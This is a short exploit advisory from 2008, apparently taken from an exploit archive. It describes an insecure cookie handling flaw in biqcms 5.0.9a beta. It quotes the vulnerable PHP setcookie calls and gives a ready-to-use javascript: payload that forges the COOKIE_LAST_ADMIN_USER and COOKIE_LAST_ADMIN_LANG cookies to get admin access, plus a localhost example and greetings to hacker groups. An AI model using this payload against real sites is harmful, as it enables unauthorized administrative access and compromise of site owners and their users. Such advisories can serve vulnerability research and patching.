biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability [~] [~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935 [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 30.10.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: a.q kpss : ) ) [~] [~] ----------------------------------------------------------- code: setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/'); setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/'); Exploit: javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; example for my localhost: javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & r00tsecurity.org & darkc0de.com [~] [~]----------------------------------------------------------------------